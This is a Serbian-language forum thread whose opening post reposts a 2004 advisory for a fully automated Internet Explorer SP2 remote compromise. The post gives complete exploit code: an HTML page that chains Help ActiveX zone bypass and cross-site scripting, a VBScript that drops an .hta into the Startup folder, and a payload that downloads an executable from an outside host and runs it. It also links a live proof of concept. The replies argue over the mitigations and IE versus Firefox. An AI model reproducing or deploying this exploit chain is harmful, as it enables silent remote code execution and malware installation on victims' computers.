Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Microsoft Internet Explorer SP2 Fully Automated Remote Compromise

[es] :: Security :: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise

[ Pregleda: 3290 | Odgovora: 14 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

_Super_Ellite_Bug_
Novi Sad, konacno!!!

Član broj: 41318
Poruke: 145
*.nat-pool.nsad.sbb.co.yu.

Sajt: www.searchlores.org


Profil

icon Microsoft Internet Explorer SP2 Fully Automated Remote Compromise02.01.2005. u 14:18 - pre 234 meseci
Microsoft Internet Explorer SP2 Fully Automated Remote Compromise

Dec, 21 2004


Vulnerable
----------
- Microsoft Internet Explorer 6.0
- Microsoft Windows XP Pro SP2
- Microsoft Windows XP Home SP2


Not Tested
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x
- Microsoft Windows 2003 Server



Severity
---------
Critical - Remote code execution, no user intervention


Intro
------
Although hundreds of millions of dollars have been spent on securing SP2, perfection is impossible. Through the joint effort of Michael Evanchik (http://www.michaelevanchik.com) and Paul from Greyhats Security (http://greyhats.cjb.net), a very critical vulnerability has been developed that can compromise a user's system without the need for user interaction besides visiting the malicious page. The vulnerability is not actually a vulnerability in itself, but rather it is uses multiple known holes in SP2 including Help ActiveX Control Related Topics Zone Security Bypass Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting Vulnerability.


Tech Stuff and Explanation
--------------------------

1. Create a webpage with the following code:

sp2rc.htm
---------------------------------------------------------------------
<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
&lt;/OBJECT&gt;

&lt;OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"&lt;script language=\\\"vbscript\\\" src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
&lt;/OBJECT&gt;

&lt;script&gt;
localpage.HHClick();
setTimeout("inject.HHClick()",100);
&lt;/script&gt;
---------------------------------------------------------------------

Explanation of above code:
The first object (id: localpage) tells hhctrl.ocx to open a help popup window to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. This file was chosen because it is treated as the local zone and it doesn't have any script to mess us up. On some computers an error is shown before the popup. This is the user's only chance to prevent the vulnerability from working. If the user were to force his computer to shut down at this point, the user would be unaffected by the exploit.

The second object (id: inject) tells the help popup to navigate to a javascript protocol, which executes. Thus, cross site scripting has just taken place. A script tag that uses a remote file is written to the page, and writehta.txt (below) is executed in the unsecured local zone.

In the script, HHClick is able to be used to automate the vulnerability. This is more effective than the previously described method of requiring a user to click on a button.


2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the user's startup folder. See Michael Evanchik's analysis of the drag and drop vulnerability for an explanation on adodb recordset.

writehta.txt
---------------------------------------------------------------------
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
window.close
---------------------------------------------------------------------


3. f00bar.txt (thanks malware for hosting this file) is the file requested by the adodb recordset (again, read the drag and drop analysis at www.michaelevanchik.com for an explanation on how this works and why the the f00bar.txt looks like it does). Because there is absolutely no limit on what you can do in an hta file, an old, yet effective method of requesting and saving a file to the user's hd is used. From that, a wscript shell is created and used to run the program. And now, ladies and gentlemen, we have compromised the user's machine.

f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"&lt;script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""&lt;/script&gt; crap="""
---------------------------------------------------------------------


4. Upload hhtctrl.ocx for the computers that don’t happen to have this control. All XP's seem to have this by default, some win2k3's do not (according to Michael Evanchik)


Proof of Concept?
------------------
- http://freehost07.websamba.com/greyhats/sp2rc.htm

- If an error is shown, press OK. This is normal.

- Notice in your startup menu a new file called Microsoft Office.hta. When run, this file will download and launch a harmless executable (which includes a pretty neat fire animation)



Vendor Recommendations
----------------------
- Like Michael Evanchik said in his previous analysis, Microsoft needs to apply XP Service Pack 2's local zone lockdown to .HTA files as well.

- This might be a little farfetched, but it would solve a lot of problems: Take out the startup folder and only support running files during startup through the registry. The startup folder is a major part of this vulnerability and I can almost gaurantee it will be used for another remote compromise.

- Microsoft could possibly take HTA files out altogether. I have not seen them used for anything beyond hacking.

- No vulnerability is too small or too insignificant to be taken seriously. Treat every vulnerability as if it could be dangerous.



User Recommendations
---------------------
- Disable hta files.
- Get yourself antivirus software. I recommend symantic because once they get their lazy asses off the couch and fix some of this stuff you will be a lot better off.
- Disable active scripting in Internet Explorer. If nothing else, do this.
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)



Credit
------
Paul from Greyhats
Michael Evanchik
Http equiv (thanks for allowing me to use your server for f00bar.txt)


Greets
------
- Liu Die Yu (all the work you've done is amazing)


Contact
-------
[email protected]
http://greyhats.cjb.net
http://michaelevanchik.com
ISO/IEC JTC1/SC22/WG14-ISO/IEC 9899:1999
 
Odgovor na temu

_Super_Ellite_Bug_
Novi Sad, konacno!!!

Član broj: 41318
Poruke: 145
*.nat-pool.nsad.sbb.co.yu.

Sajt: www.searchlores.org


Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise02.01.2005. u 22:20 - pre 234 meseci
Evo i interesantne diskusije u vezi ovoga i jos ponesto :o)) na,za sada 19 strana
http://www.webservertalk.com/message843329.html
ISO/IEC JTC1/SC22/WG14-ISO/IEC 9899:1999
 
Odgovor na temu

Sundance

Član broj: 7510
Poruke: 2559
*.sava.sczg.hr.



Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise05.01.2005. u 10:25 - pre 234 meseci
Kad ce wintrollovi poceti pored exploita davati i linkove kako se zastiti od istih?

Trojan zahtijeva administratorske privilegije, tako da ako ste ulogirani kao obicni korisnici trebali bi biti OK.

kill bit:
http://support.microsoft.com/?kbid=240797
GUID:
{8856F961-340A-11D0-A96B-00C04FD705A2}
 
Odgovor na temu

_Super_Ellite_Bug_
Novi Sad, konacno!!!

Član broj: 41318
Poruke: 145
*.nat-pool.nsad.sbb.co.yu.

Sajt: www.searchlores.org


Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise06.01.2005. u 16:15 - pre 234 meseci
Citat:
Kad ce wintrollovi poceti pored exploita davati i linkove kako se zastiti od istih?

..valjda racunaju na samoinicijativu korisnika PC-a. :o) Doduse, u pomenutom slucaju postoje Vendor Recommendations & User Recommendations. U kojoj meri to moze da pomenutim korisnicima resi problem, opet je na njima(nama), korisnicima.



ISO/IEC JTC1/SC22/WG14-ISO/IEC 9899:1999
 
Odgovor na temu

Sundance

Član broj: 7510
Poruke: 2559
*.sava.sczg.hr.



Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise06.01.2005. u 23:08 - pre 234 meseci
Citat:
_Super_Ellite_Bug_: ....i pomenutom slucaju postoje Vendor Recommendations & User Recommendations.


Koji ne kazu nista konkretno. 99% Windows korisnika nije culo da postoje .HTA datoteke sve dok ovdje nisu culi za njih, a kamoli da su ih u stanju onemoguciti. Brisanje start-up direktorija je samo workaround za _jedan_ od mogucih nacina exploitanja, ne rjesava problem.

Citat:

User Recommendations
---------------------
...
Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)


Sto opet NIJE rjesenje problema vec bjezanje od njega. To je isto kao da kazes ako ti Windows ne radi dobro da formatiras disk ili, ne daj boze, instaliras linux. Tako problem "rjesavaju" lijencine i neznalice.
 
Odgovor na temu

_Super_Ellite_Bug_
Novi Sad, konacno!!!

Član broj: 41318
Poruke: 145
*.nat-pool.nsad.sbb.co.yu.

Sajt: www.searchlores.org


Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise07.01.2005. u 22:21 - pre 233 meseci
Citat:
99% Windows korisnika nije culo da postoje .HTA datoteke sve dok ovdje nisu culi za njih, a kamoli da su ih u stanju onemoguciti


Veliki deo "trzista" virusa, trojanaca i sl. "namenjen" je takvim korisnicima.

I tu postoji problem, problem u edukaciji takvih korisnika.

Citat:

Citat:

Citat:

User Recommendations
---------------------
...
Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)


Sto opet NIJE rjesenje problema vec bjezanje od njega

Ne bih se slozio sa tobom. IE je ipak problematican "komad" softvera. IE treba da je problem Microsofta a ne korisnika. Necu da preporucujem ni jedan browser, neka svako odluci koji ce browser da koristi.



ISO/IEC JTC1/SC22/WG14-ISO/IEC 9899:1999
 
Odgovor na temu

Sundance

Član broj: 7510
Poruke: 2559
*.sava.sczg.hr.



Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise07.01.2005. u 22:48 - pre 233 meseci
Citat:
_Super_Ellite_Bug_: Veliki deo "trzista" virusa, trojanaca i sl. "namenjen" je takvim korisnicima. I tu postoji problem, problem u edukaciji takvih korisnika.


Pricao sam o tzv. "uputama" koje kazu da se "onemoguce .HTA datoteke", tj. o nepostojanju istih, ne mijesaj sad kruske i jabuke. Korisnost ovih "uputa" je vrlo mala.

Citat:
Ne bih se slozio sa tobom. IE je ipak problematican "komad" softvera. IE treba da je problem Microsofta a ne korisnika. Necu da preporucujem ni jedan browser, neka svako odluci koji ce browser da koristi.


A sta kad taj neproblematicni komad softvera postane problematican jednog dana? FF-u jaaaako raste popularnost zadnjih dana, mislis da je _nemoguce_ za njega napisati spyware/adware?

Sto se vise prica o rupama http://www.theregister.co.uk/2005/01/07/mozilla_flaws/ to ce vise ljudi traziti iste, i ti ljudi nisu bubuljicasti teenageri koji exploite pisu iz zajebancije i istog ih trena postaju na bugtraq, nego security profesionalci koji za to primaju jaaako veliku lovu.

You can run, but you cannot hide. Najvise spywarea se ne instalira kroz BHO i ostale dodatke IE-u, vec kroz externe programe, bjezanje na FF njih nece ukloniti, premda ce rijesiti neke probleme sa kojima je IE u vecoj mjeri suocen od FF-a ATM.

Ako stvarno mislis da su edukacija korisnika o mehanizmima zastite i njihova primjena u vidu anti-* alata pogresan pristup, onda stvarno nemamo sta pricat.

Ako mislis da je XP supalj, zasto ne koristis OpenBSD?

 
Odgovor na temu

_Super_Ellite_Bug_
Novi Sad, konacno!!!

Član broj: 41318
Poruke: 145
*.nat-pool.nsad.sbb.co.yu.

Sajt: www.searchlores.org


Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise08.01.2005. u 03:13 - pre 233 meseci

Citat:
_Super_Ellite_Bug_: Veliki deo "trzista" virusa, trojanaca i sl. "namenjen" je takvim korisnicima. I tu postoji problem, problem u edukaciji takvih korisnika
.

Citat:

Ako stvarno mislis da su edukacija korisnika o mehanizmima zastite i njihova primjena u vidu anti-* alata pogresan pristup, onda stvarno nemamo sta pricat.

Ne odnosi se na tvoj komentar u vezi .HTA datoteka. Nastavlja se na tvoj komentar u smislu da postoji nizak nivo "racunarsko-korisnicke" pismenosti kod velike vecine korisnika. Toliko o kruskama i jabukama.

Citat:

A sta kad taj neproblematicni komad softvera postane problematican jednog dana? FF-u jaaaako raste popularnost zadnjih dana, mislis da je _nemoguce_ za njega napisati spyware/adware?
.

Da, to je izvesno, da ce se pre ili kasnije nesto tako pojaviti. Sto je vise "neki komad" softvera popularizovan i sto se frekfentnije koristi to je interasntniji za ispitivanje i pronalazenje nacina "kako ne treba da radi".

Citat:
Ako mislis da je XP supalj, zasto ne koristis OpenBSD?]

XP nigde nije pomenut. Nastranu IE, ipak je Microsoft u svojoj mudrosti napravio dobar OS,
OpenBSD? hmm.. vise mi se svidja FreeBSD flavor.
ISO/IEC JTC1/SC22/WG14-ISO/IEC 9899:1999
 
Odgovor na temu

Sundance

Član broj: 7510
Poruke: 2559
*.sava.sczg.hr.



Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise08.01.2005. u 09:30 - pre 233 meseci
Stvarno mi nisi jasan. Prvo kazes

Citat:
..valjda racunaju na samoinicijativu korisnika PC-a. :o) Doduse, u pomenutom slucaju postoje Vendor Recommendations & User Recommendations. U kojoj meri to moze da pomenutim korisnicima resi problem, opet je na njima(nama), korisnicima


i onda ti ja komentiram da su te "upute" bzveze jer samo kazu

Citat:
- Disable hta files.


Za koje 99% korisnika nije u zivotu culo, mozda malo manje i stvarno zna kako onemogucit .HTA datoteke, te da ovakve upute imaju jako malu prakticnu vrijednost.

Na sto si ti rekao

Citat:
_Super_Ellite_Bug_: Veliki deo "trzista" virusa, trojanaca i sl. "namenjen" je takvim korisnicima. I tu postoji problem, problem u edukaciji takvih korisnika.


Sto nema veze sa izvornim postom kojeg komentiras.

Cak stovise! Citiras moj komentar o tome kako je bjezanje od problema pogresan pristup i spominjes ga u kontekstu u kojem se peres o optuzbi mijesanja kruska i jabuka. Opet bzvze.

Citat:

XP nigde nije pomenut. Nastranu IE, ipak je Microsoft u svojoj mudrosti napravio dobar OS


Komentar u vezi mijenjanja OS-a sam spomenuo samo zato da karikiram do koje razine moze ici takva "ako ne valja - mijenjaj" logika. A sto ako nekome bas treba IE? Bez IE-a ne moze napraviti Windows Update; ako mu se na njega nakacio adware, tesko da ce rijesiti problem tako sto ce preci na FF, kad opet mora prije ili kasnije pokrenit IE da update-a masinu. A sto ako mora koristiti ActiveX? Recimo zeli napravciti online AV sken od kojih su vecina napravljeni kao ActiveX kontrole ili ako je corporate korisnik i ima neku custom kontrolu koju mora koristiti?

Jedna je stvar savjetovanje koristenja FF cim se moze, za casual surfing, a druga je zealotizam "fuj IE, brisi to sa diska". Sto se vise bjezi od srzi problema, do ces prije dobiti po prstima u vidu manifestiranja tog problema u drugom obliku na drugom mjestu.

IE se moze relativno lako odrzati cistim i sigurnim, dovoljno je samo par besplatnih programcica. Ako netko misli da je i to previse, neka slobodno koristi FF. Ako misli da se time zauvijek rijesio spyware-a, onda grdno grijesi.

Citat:
OpenBSD? hmm.. vise mi se svidja FreeBSD flavor.


Ni jedan ni drugi ne podrzavaju moj hardver (tj. uopce se ne daju instalirati), pa ih ni ne smatram OS-evima u pravom smislu, vec programima koji vrlo dobro i jeftino zamjenjuju Windows Server 2003 pod opterecenjem. nhf :)
 
Odgovor na temu

_Super_Ellite_Bug_
Novi Sad, konacno!!!

Član broj: 41318
Poruke: 145
*.nat-pool.nsad.sbb.co.yu.

Sajt: www.searchlores.org


Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise08.01.2005. u 11:44 - pre 233 meseci
Citat:
Citiras moj komentar o tome kako je bjezanje od problema pogresan pristup i spominjes ga u kontekstu u kojem se peres o optuzbi mijesanja kruska i jabuka. Opet bzvze

"perem"??, "optuzbe"??... mislim da sam bio dovoljno jasan... ako jos jednom budem morao da "se pojasnim" shvaticu to kao pravdanje, a onda cu da se spontano ispovracam po tastaturi...

Citat:
Ni jedan ni drugi ne podrzavaju moj hardver (tj. uopce se ne daju instalirati), pa ih ni ne smatram OS-evima u pravom smislu, vec programima koji vrlo dobro i jeftino zamjenjuju Windows Server 2003 pod opterecenjem. nhf :)

OK, nhf :o))))
Licno, postujem sve OS.

ISO/IEC JTC1/SC22/WG14-ISO/IEC 9899:1999
 
Odgovor na temu

Sundance

Član broj: 7510
Poruke: 2559
*.sava.sczg.hr.



Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise08.01.2005. u 23:00 - pre 233 meseci
Citat:
_Super_Ellite_Bug_: "perem"??, "optuzbe"??... mislim da sam bio dovoljno jasan... ako jos jednom budem morao da "se pojasnim" shvaticu to kao pravdanje, a onda cu da se spontano ispovracam po tastaturi...


Nisi se obranio od optuzbe (niti pojasnio svoje stavove) da je korisnost "upute" o onemogucavanju .HTA datoteka prakticno nistavna, i da je mijenjanje browsera rjesavanje problema.

Kasnije si spomenuo vaznost znanja korisnika (valjda si mislio na vaznost redovitog update-a), ali nejasno u kojem si to konekstu povezao sa IE.

 
Odgovor na temu

_Super_Ellite_Bug_
Novi Sad, konacno!!!

Član broj: 41318
Poruke: 145
*.nat-pool.nsad.sbb.co.yu.

Sajt: www.searchlores.org


Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise09.01.2005. u 01:41 - pre 233 meseci
Savet, izmedju napada besa prizovi se pameti.

Ne koriscenje IE u vecini slucajeva definitivno jeste resavanje problema svidelo se to tebi ili ne.

Citat:
Kasnije si spomenuo vaznost znanja korisnika (valjda si mislio na vaznost redovitog update-a), ali nejasno u kojem si to konekstu povezao sa IE

Ovo je totalna dubioza... Jesi li naduvan ili pijan ?

MODERATORI, ZAKLJUCAVAJ!!!!


[Ovu poruku je menjao _Super_Ellite_Bug_ dana 09.01.2005. u 03:02 GMT+1]
ISO/IEC JTC1/SC22/WG14-ISO/IEC 9899:1999
 
Odgovor na temu

degojs

Član broj: 4716
Poruke: 5096



+51 Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise09.01.2005. u 01:57 - pre 233 meseci
Citat:
MODERATORI, ZAKLJUCAVAJ!!!!

Ključevi su kod moderatora markom (aka Marko Misterija - ostaje nepoznato zašto toliko voli da zaključava :)

Besides, you guys are excellent entertainment :)
Commercial-Free !!!
 
Odgovor na temu

Sundance

Član broj: 7510
Poruke: 2559
*.sava.sczg.hr.



Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise09.01.2005. u 16:46 - pre 233 meseci
Citat:
_Super_Ellite_Bug_: Savet, izmedju napada besa prizovi se pameti.


Bijes? Napadi bijesa? :)

Je li to nova taktia linux ze****-a da oponente pokusavaju proglasiti ludim nakon sto su ostali isprani cistim faktima? :)

Citat:
Ne koriscenje IE u vecini slucajeva definitivno jeste resavanje problema svidelo se to tebi ili ne.


Pokusaj malo za promjenu koristiti Windows/IE osim sto citas /. i tuxme, najveci dio spywarea se instalira preko externih programa.

Pokusaj jos jednom za promjenu koristiti podeseni IE (Maxthon) pri surfanju pa ces vidjeti da je sypware samo nesto sto citas na Virii forumu.

Citat:
Ovo je totalna dubioza... Jesi li naduvan ili pijan ?


Opet klasicno pozivanje na "on je lud" pristup. Zasto ne mozes prihvatiti cinjenicu da si pogrijesio i da je ovaj advisory nepotpun u smislu da pruza stvarne upute u osiguranju od exploita tj. Trojan.Phel?
 
Odgovor na temu

Shadowed
Vojvodina

Član broj: 649
Poruke: 12846



+4783 Profil

icon Re: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise09.01.2005. u 16:56 - pre 233 meseci

OK, mislim da je bilo dovoljno. Ovo sve vec prelazi u flame (obostrano) i u uobicajenu lin vs win prepirku a prestaje da biva smislena diskusija. Predlazem da se smirite ili nastavite na Advocacy-u.



 
Odgovor na temu

[es] :: Security :: Microsoft Internet Explorer SP2 Fully Automated Remote Compromise

[ Pregleda: 3290 | Odgovora: 14 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.